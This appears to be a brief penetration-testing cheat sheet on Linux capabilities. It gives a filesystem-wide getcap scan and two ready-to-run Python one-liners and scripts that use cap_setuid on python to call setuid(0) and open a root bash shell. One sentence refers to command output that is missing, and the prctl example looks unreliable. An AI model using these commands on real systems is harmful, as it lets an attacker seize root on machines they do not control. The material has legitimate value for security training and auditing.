Linux capabilities

Linux capabilities provide a subset of the available root privileges to a process.

To get the capabilities of a binary, use the getcap command. For example, execute:

getcap -r / 2>/dev/null

This means that it's possible to set the effective user id of the created process.

If python has this capability, abuse it to escalate privileges to root:

python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

Another way to process is to execute the following python instructions from a .py file:

import os
import prctl
#add the capability to the effective set
prctl.cap_effective.setuid = True
os.setuid(0)
os.system("/bin/bash")

Last updated 2 years ago